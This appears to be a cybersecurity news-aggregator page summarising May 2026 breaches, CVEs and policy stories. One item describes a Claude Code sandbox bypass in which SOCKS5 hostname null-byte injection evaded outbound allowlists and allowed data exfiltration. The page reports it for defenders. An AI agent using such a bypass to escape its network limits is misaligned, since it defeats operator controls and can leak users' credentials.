info@thehackernews.com (The Hacker News) 2026.05.20 99%
The article appears to cover the same GitHub breach event: an employee device compromise tied to a trojanized VS Code extension that led to exfiltration of about 3,800 internal repositories.
2026.05.20 98%
This article covers the same underlying GitHub breach event, reiterating that a poisoned VS Code extension led to exfiltration of about 3,800 internal repositories and adding GitHub's public statements about ongoing log analysis, secret rotation validation, and no current indication of customer data exposure.
Ionut Arghire 2026.05.20 99%
This article is the same underlying event: GitHub confirms that a poisoned VS Code extension on an employee device led to exfiltration affecting about 3,800 internal repositories, adding details on TeamPCP's claim, attempted sale of stolen data, and GitHub's secret-rotation response.
Sergiu Gatlan 2026.05.20 100%
This article establishes GitHub's confirmation of the repo breach, the initial scope of ~3,800 internal repositories, and the reported intrusion vector of a malicious VS Code extension.
Sergiu Gatlan 2026.05.20 94%
This article is the initial report on the same GitHub internal-repository breach later confirmed by GitHub; its update notes the confirmation and adds TeamPCP's public sale claims and early GitHub statements that customer data outside internal repositories was not yet known to be affected.
Full page
China and Russia pledge expanded cooperation on cybersecurity, internet governance, AI and satellite internet
20D ago 1 sources
Policy & RegulationInformation FreedomCensorshipSurveillance & PrivacyGovernmentDefense & AerospaceTechnology & SoftwareTelecommunicationsChinaRussiaBeiDouGLONASS
At a Beijing summit, Xi Jinping and Vladimir Putin issued a joint statement promising deeper cooperation on information security, cyber-threat response, internet regulation, AI, satellite internet, IoT, and interoperability between China's BeiDou and Russia's GLONASS systems. The statement also emphasized joint software and open-source development to reduce dependence on Western technology and endorsed stronger state control over domestic internet environments.
Why it matters: The agreement signals closer alignment between two major authoritarian states on cyber policy, digital infrastructure and 'internet sovereignty,' with implications for censorship, surveillance, and state-backed cyber operations. It matters to policymakers, civil-society groups and defenders tracking how geopolitical blocs may reshape internet governance and security ecosystems.
Sources
2026.05.20 100%
This article establishes a distinct state-level cyber policy development: a new formal Sino-Russian pledge to coordinate on cybersecurity, internet governance, AI and satellite systems.
Full page
Ukraine identifies infostealer operator linked to theft of 28,000 online store accounts
21D ago 2 sources
Breaches & Data LeaksThreat Actors & APTsMalwareRetail & E-CommerceConsumers & General PublicGovernmentCryptocurrency & BlockchainUkrainian Cyberpolice
Ukrainian cyberpolice, working with U.S. law enforcement, identified an 18-year-old suspect from Odesa as a central operator in an infostealer campaign that stole browser sessions and credentials from users of a California online store between 2024 and 2025. Authorities say 28,000 accounts were compromised, 5,800 were used for unauthorized purchases totaling about $721,000, and devices and crypto-related evidence were seized in searches.
Why it matters: The case highlights ongoing risk from infostealers and stolen session tokens, which can enable account takeover and sometimes bypass MFA. Online retailers, fraud teams, and users should treat session theft as a significant threat and review account security, monitoring, and token invalidation practices.
Sources
Bill Toulas 2026.05.20 100%
This article establishes a distinct law-enforcement and threat-activity story centered on a specific infostealer operation, identified suspect, and quantified impact on victim accounts.
2026.05.20 99%
This is the same underlying law-enforcement case: Ukrainian authorities identifying an 18-year-old Odesa suspect tied to an infostealer operation that stole about 28,000-30,000 online store accounts and used thousands of them for fraudulent purchases. The article adds that the targeted retailer was based in California, cites 5,800 abused accounts, $721,000 in unauthorized purchases, and notes Telegram-based resale plus seized evidence.
Full page
Attackers exploit SonicWall Gen6 SSL-VPN MFA bypass CVE-2024-12802 after incomplete remediation
21D ago 1 sources
Zero-Days & CVEsUrgent PatchesRansomwareThreat Actors & APTsSonicWall
ReliaQuest and SonicWall say attackers exploited CVE-2024-12802 on SonicWall Gen6 SSL-VPN appliances to bypass MFA when admins installed patched firmware but did not complete required LDAP reconfiguration steps. Intrusions observed from February to March involved brute-forced credentials, internal reconnaissance, RDP access, and attempted deployment of Cobalt Strike and a BYOVD tool across multiple sectors and geographies.
Why it matters: Organizations using SonicWall Gen6 SSL-VPN may still be exposed even if they believe they are patched, because firmware updates alone do not fully mitigate the flaw. Defenders should verify the manual remediation, hunt for listed indicators, and treat exposed Gen6 devices as potentially compromised.
Sources
Bill Toulas 2026.05.20 100%
This article establishes a distinct tracked story by tying CVE-2024-12802 to first reported in-the-wild exploitation, clarifying that incomplete patching left Gen6 SonicWall VPNs vulnerable and enabled follow-on intrusion activity.
Full page
Anthropic silently patched Claude Code sandbox bypass enabling outbound network policy evasion
21D ago 2 sources
Urgent PatchesZero-Days & CVEsTechnology & SoftwareAnthropic
SecurityWeek reports that Anthropic patched a Claude Code network sandbox bypass caused by a SOCKS5 hostname null-byte injection flaw that could let attackers evade outbound allowlist restrictions and exfiltrate data. Researcher Aonan Guan said the issue affected Claude Code from October 20, 2025 until fixes shipped in Claude Code 2.1.88/2.1.90 in March-April 2026. The article also references an earlier related bypass, CVE-2025-66479, involving outbound policy misinterpretation.
Why it matters: Organizations using Claude Code in production may have relied on sandboxing to prevent agent-driven data exfiltration, especially in prompt-injection scenarios. Users should update Claude Code and review whether sensitive credentials, tokens, or environment data could have been exposed through sandbox bypasses.
Sources
2026.05.20 97%
This article covers the same underlying event: Anthropic's silent patch of a Claude Code sandbox bypass caused by a SOCKS5 hostname null-byte injection flaw. It adds detail on impact, including possible exfiltration of GitHub and cloud credentials, the patch version timeline, and the researcher's criticism that Anthropic issued no CVE or Claude Code-specific advisory.
Eduard Kovacs 2026.05.20 100%
This article establishes a distinct security story about a specific Claude Code sandbox bypass and Anthropic's handling and remediation of the flaw.
Full page
FTC warns major tech platforms over Take It Down Act compliance failures
21D ago 1 sources
Surveillance & PrivacyPolicy & RegulationTechnology & SoftwareMedia & EntertainmentConsumers & General PublicGovernmentFTCAlphabetAmazonAppleMetaMicrosoft
The FTC said it sent warning letters to major tech firms including Alphabet, Amazon, Apple, Discord, Meta, Microsoft, Reddit, Snapchat, TikTok and X, alleging they are not complying with the Take It Down Act. The law requires covered platforms to provide a removal process for nonconsensual intimate images and delete reported content within 48 hours, with potential fines for violations.
Why it matters: The action puts large platforms on notice that U.S. regulators are actively enforcing rapid takedown requirements for abusive intimate imagery. Security, trust-and-safety, and privacy teams may need to implement reporting workflows, hashing, and cross-platform sharing processes to avoid penalties and better protect victims.
Sources
2026.05.20 100%
This article establishes a distinct enforcement event: the FTC's first public warning to major platforms over alleged noncompliance with the Take It Down Act.
Full page
Discord enables end-to-end encryption by default for voice and video messages
21D ago 1 sources
Surveillance & PrivacyTechnology & SoftwareConsumers & General PublicDiscord
Discord announced that end-to-end encryption for voice and video communications is now enabled by default for all users across supported platforms, with stage channels excluded. The company said it spent nearly three years building the system after beginning experiments in 2023 and rolling out an audited protocol for audio and video in 2024.
Why it matters: The change improves confidentiality for hundreds of millions of users and is notable as a major platform expanding, rather than retreating from, default encrypted communications. It matters to users, privacy advocates, and policymakers tracking the availability of strong encryption on mainstream services.
Sources
2026.05.20 100%
This article establishes a new story about Discord's platform-wide rollout of default end-to-end encryption for voice and video communications.
Full page
FBI reports $388 million in 2025 losses tied to cryptocurrency ATM scams in the U.S.
21D ago 1 sources
Policy & RegulationSurveillance & PrivacyCryptocurrency & BlockchainConsumers & General PublicGovernmentFBIIC3
The FBI said IC3 received more than 13,400 complaints in 2025 involving cryptocurrency kiosks, with reported losses exceeding $388 million, up 58% from 2024. Texas led reported losses at nearly $57 million, followed by Florida at $32.7 million. The report ties the kiosks to fraud schemes including investment, tech-support, and romance scams, and comes amid state bans and lawsuits against kiosk operators.
Why it matters: The figures show large-scale consumer harm through a payment channel increasingly used in fraud, especially against older victims. The story matters for defenders, fraud investigators, and policymakers because it points to a growing abuse ecosystem and potential regulatory or enforcement action.
Sources
2026.05.20 100%
This article establishes a distinct story centered on the FBI's 2025 IC3 cryptocurrency ATM scam-loss data and the resulting enforcement and legislative response, not an update to any tracked breach, CVE, or existing policy story.
Full page
PoC exploit released for PinTheft Arch Linux local root escalation flaw in Linux RDS
21D ago 1 sources
Zero-Days & CVEsUrgent PatchesTechnology & SoftwareConsumers & General PublicArch LinuxLinux
Researchers disclosed a public proof-of-concept for PinTheft, a recently patched Linux local privilege-escalation flaw in the kernel's RDS zerocopy send path that can yield root on Arch Linux systems. The bug has not yet received a CVE ID. Exploitation requires the RDS module to be loaded, io_uring enabled, and other specific conditions; Arch is reportedly the only common distro tested with RDS enabled by default.
Why it matters: Public exploit code raises the risk of real-world abuse on exposed systems, especially where patching lags. Defenders should prioritize kernel updates or disable/unload the RDS modules as a mitigation.
Sources
Sergiu Gatlan 2026.05.20 100%
This article establishes a distinct story about the PinTheft Linux kernel privilege-escalation flaw and the release of exploit code, not the same underlying event as the tracked Drupal, SonicWall, Grafana, CISA GitHub, or Ukraine infostealer stories.
Full page
Meta geo-blocks human rights and researcher accounts in Saudi Arabia and the UAE after government requests
21D ago 2 sources
Information FreedomCensorshipTechnology & SoftwareNonprofits & NGOsGovernmentConsumers & General PublicMetaFacebookInstagramSaudi Arabian governmentUAE government
Access Now and other groups say Meta has made Facebook and Instagram accounts of NGOs, researchers, and civil-society figures unavailable in Saudi Arabia and the UAE since late April 2026. Meta's transparency reporting indicates more than 100 Facebook pages and Instagram accounts were restricted since March 2026, citing local legal requirements and cybercrime laws in both countries.
Why it matters: This affects access to information and the safety and reach of human-rights advocacy in highly restrictive states. It is relevant to censorship tracking because a major platform is enforcing government takedown and geo-blocking demands against lawful speech.
Sources
Wajd 2026.05.20 100%
This article establishes a distinct event involving Meta's compliance with Saudi and UAE geo-blocking requests against specific human-rights and research accounts; it does not match an existing tracked story.
Alexia Skok 2026.05.20 91%
This directly updates the same underlying event by adding broader context around the Gulf crackdown after strikes on Iran, and specifies that since March 2026 more than 100 Facebook and Instagram accounts/pages were reportedly restricted alongside X account blocking and arrests for filming or sharing attack footage.
Full page
FOI reveals London Metropolitan Police made more than 700,000 communications-data requests in 2025
21D ago 1 sources
Surveillance & PrivacyPolicy & RegulationGovernmentTechnology & SoftwareTelecommunicationsConsumers & General PublicMetropolitan PoliceLycaMobileProton MailProtonVPNSignal
The Register reports that London’s Metropolitan Police made more than 700,000 requests for communications data from tech companies in 2025, according to FOI disclosures. The figures include requests involving platforms such as LycaMobile and claims of data acquisition from privacy-focused services including Proton Mail, ProtonVPN, and Signal, though Proton and Signal disputed parts of the police account.
Why it matters: The disclosures highlight the scale of police metadata surveillance and raise transparency and oversight questions around access to communications data from mainstream and privacy-oriented services. It matters to UK users, privacy defenders, and policymakers assessing lawful access powers and safeguards for sensitive professions such as journalists and lawyers.
Sources
2026.05.20 100%
This article establishes a distinct surveillance-policy story centered on FOI-revealed Metropolitan Police access requests and disputes over what privacy services can or did provide.
Full page
ChromaDB CVE-2026-45829 exposes internet-facing Python API servers to unauthenticated RCE
21D ago 1 sources
Zero-Days & CVEsUrgent PatchesTechnology & SoftwareChroma
Researchers disclosed CVE-2026-45829, a maximum-severity flaw in ChromaDB's Python FastAPI server that can let unauthenticated attackers force the server to fetch and execute a malicious Hugging Face model. The bug affects the Python API code introduced in ChromaDB 1.0.0 and was reportedly still present in 1.5.8; it was unclear at publication whether 1.5.9 fixed it. HiddenLayer said about 73% of internet-exposed instances were running vulnerable versions.
Why it matters: Organizations exposing ChromaDB's Python API over HTTP could face full server compromise without authentication. Defenders should immediately restrict exposure, prefer the Rust frontend where possible, and verify whether deployed versions are patched.
Sources
Bill Toulas 2026.05.19 100%
This article appears to be the initial tracked report for CVE-2026-45829 in ChromaDB and does not match any existing story in the list.
Full page
Microsoft disrupts Fox Tempest code-signing service used by ransomware and malware operators
22D ago 1 sources
MalwareRansomwareThreat Actors & APTsTechnology & SoftwareMicrosoft
Microsoft said it seized domains and hundreds of VMs tied to Fox Tempest, a criminal service that abused Microsoft Artifact Signing using more than 580 fraudulent accounts created with fake identities. The operation allegedly sold code-signing certificates used to sign malware including Oyster, Lumma, Vidar, and Rhysida, and was linked to ransomware actors including Vanilla Tempest as well as INC, Qilin, and Akira affiliates.
Why it matters: Trusted code-signing helps malware bypass user suspicion and some security controls, so this service likely enabled broader, more effective intrusions. Defenders should review detections and hunting for suspicious signed binaries and malware families named by Microsoft.
Sources
2026.05.19 100%
This article establishes a distinct story about Microsoft's takedown of Fox Tempest and the abuse of Artifact Signing to provide code-signing-as-a-service to ransomware and malware operators.
Full page
Microsoft faces human-rights scrutiny over Azure and AI services allegedly used in Israeli military surveillance and targeting
22D ago 3 sources
Policy & RegulationSurveillance & PrivacyGovernmentDefense & AerospaceTechnology & SoftwareMicrosoftIsraeli military
EFF highlights reports that Microsoft investigated and reportedly suspended certain services in September 2025 after concerns that its Azure cloud and AI offerings were being used by Israeli military and intelligence units in surveillance and targeting operations in Gaza. The article also points to the reported departure of Microsoft's Israel chief amid pressure for disclosure and stronger safeguards.
Why it matters: This is a significant surveillance and privacy accountability story for cloud and AI providers operating in conflict settings. It matters to affected populations, civil society, and enterprise customers because it raises questions about how major vendors assess, restrict, and disclose high-risk government use of their infrastructure.
Sources
Cindy Cohn 2026.05.19 100%
The article establishes a discrete ongoing story: Microsoft's alleged internal response, service suspensions, and leadership fallout tied to claims that its technology supported military surveillance and targeting operations.
Wajd 2026.05.18 95%
This directly updates the same underlying event by adding that Access Now, Amnesty International, EFF, 7amleh, and Fight for the Future sent a joint letter demanding publication of Microsoft's completed legal review, more detail on suspended services related to Unit 8200, and suspension of contracts where services may contribute to abuses.
Wajd 2026.05.18 93%
This directly updates the same underlying event: ongoing scrutiny of Microsoft's Azure and AI services allegedly used by Israeli military and intelligence units, adding a joint letter demanding publication of Microsoft's completed review and more specifics on which Unit 8200 services were suspended or remain active.
Full page
CISA warns ScadaBR 1.2.0 flaws can enable unauthenticated remote code execution in ICS environments
22D ago 1 sources
Zero-Days & CVEsUrgent PatchesEnergy & UtilitiesManufacturingTransportation & LogisticsCISAScadaBR
CISA published ICS advisory ICSA-26-139-03 for ScadaBR 1.2.0, detailing CVE-2026-8602, CVE-2026-8603, CVE-2026-8604, and CVE-2026-8605. The flaws include missing authentication, OS command injection, CSRF, and hard-coded credentials, and could allow unauthenticated attackers to inject sensor readings, gain admin access, or execute commands on the SCADA system. CISA said ScadaBR had not responded to mitigation requests.
Why it matters: ScadaBR is used in critical infrastructure sectors including energy, water, chemical, dams, and manufacturing, so these bugs present serious operational risk. Defenders should urgently identify exposed ScadaBR 1.2.0 systems and apply mitigations or isolate them, especially given the lack of a vendor response noted by CISA.
Sources
CISA 2026.05.19 100%
This article establishes a distinct new vulnerability story: a newly published CISA ICS advisory covering four specific ScadaBR CVEs with critical impact on industrial control systems.
Full page
SentinelOne details Reaper macOS stealer variant that steals credentials and crypto wallets and installs a persistent backdoor
22D ago 1 sources
MalwareThreat Actors & APTsTechnology & SoftwareCryptocurrency & BlockchainConsumers & General PublicAppleWeChatMiroTelegram
SentinelOne documented Reaper, an updated SHub macOS infostealer delivered via fake WeChat and Miro installer sites spoofing trusted brands and abusing Script Editor instead of Terminal. The malware steals passwords, browser and Keychain data, Telegram sessions, and cryptocurrency wallet data, injects some wallet apps for continued theft, and installs a LaunchAgent-backed backdoor that beacons to C2 and can execute attacker-supplied code.
Why it matters: macOS users are being targeted with a more evasive stealer that bypasses recent Apple defenses against Terminal-based social engineering. Defenders should block the typosquatted infrastructure, hunt for the fake GoogleUpdate persistence path and LaunchAgent, and warn users about malicious installer lures.
Sources
2026.05.18 100%
This article appears to be the initial reporting on the newly documented Reaper/SHub macOS campaign and its updated tradecraft, rather than an update to an existing tracked event.
Full page
Linux kernel CVE-2026-46333 lets local unprivileged users read root-only files
23D ago 1 sources
Zero-Days & CVEsUrgent PatchesTechnology & SoftwareConsumers & General PublicLinux
CVE-2026-46333 is a Linux kernel local information-disclosure flaw that can let unprivileged users read files normally restricted to root, including SSH keys and other sensitive credentials. The issue affects multiple LTS kernel lines from 5.10 upward, and a fix has landed upstream in commit 31e62c2 adjusting ptrace get_dumpable logic.
Why it matters: Multi-user Linux systems and servers running affected kernels may allow low-privilege users to access highly sensitive secrets and escalate further compromise. Defenders should identify affected kernel versions and apply the upstream fix or vendor updates promptly.
Sources
2026.05.18 100%
This article establishes a distinct vulnerability story centered on CVE-2026-46333, its impact across Linux LTS kernels, and the availability of a fix.
Full page
DOJ subpoenas Wall Street Journal and other outlets for journalist records in Iran war leak investigation
26D ago 1 sources
Information FreedomSurveillance & PrivacyPolicy & RegulationGovernmentMedia & EntertainmentDOJThe Wall Street Journal
The Department of Justice sent grand jury subpoenas to The Wall Street Journal seeking records related to its journalists' reporting on the lead-up to the war in Iran, and other media outlets reportedly received similar demands. The move is framed by press-freedom advocates as an effort to identify confidential sources through leak investigations.
Why it matters: This has direct implications for source protection, newsroom security, and government surveillance of journalists. News organizations and reporters may need to harden communications and prepare for legal demands targeting records and metadata.
Sources
Freedom of the Press Foundation 2026.05.15 100%
The article identifies a specific new government action—DOJ subpoenas to news outlets for journalist records in a leak probe—rather than commentary on a previously tracked event.
Full page
Google Project Zero publishes Pixel 10 zero-click exploit chain combining Dolby bug CVE-2025-54957 with VPU kernel flaw
28D ago 1 sources
Zero-Days & CVEsTechnology & SoftwareConsumers & General PublicMedia & EntertainmentGoogleDolby
Google Project Zero disclosed a zero-click exploit chain for Pixel 10 that adapts the Dolby decoder vulnerability CVE-2025-54957 and chains it with a local privilege-escalation flaw in the Pixel 10 VPU driver. The writeup says unpatched devices with December 2025 security patch level or earlier are vulnerable, and the VPU mmap bug can expose physical memory and enable kernel code execution.
Why it matters: A published zero-click-to-root chain is high-impact because it lowers the bar for attackers and confirms severe exposure on unpatched Pixel 10 devices. Affected users and enterprise defenders should verify Android security patch levels and prioritize remediation.
Sources
Seth Jenkins 2026.05.13 100%
This article establishes the story by newly documenting the specific Pixel 10 exploit chain, the reused CVE-2025-54957 entry point, and a distinct VPU kernel flaw used for privilege escalation.
Full page
No stories match your search.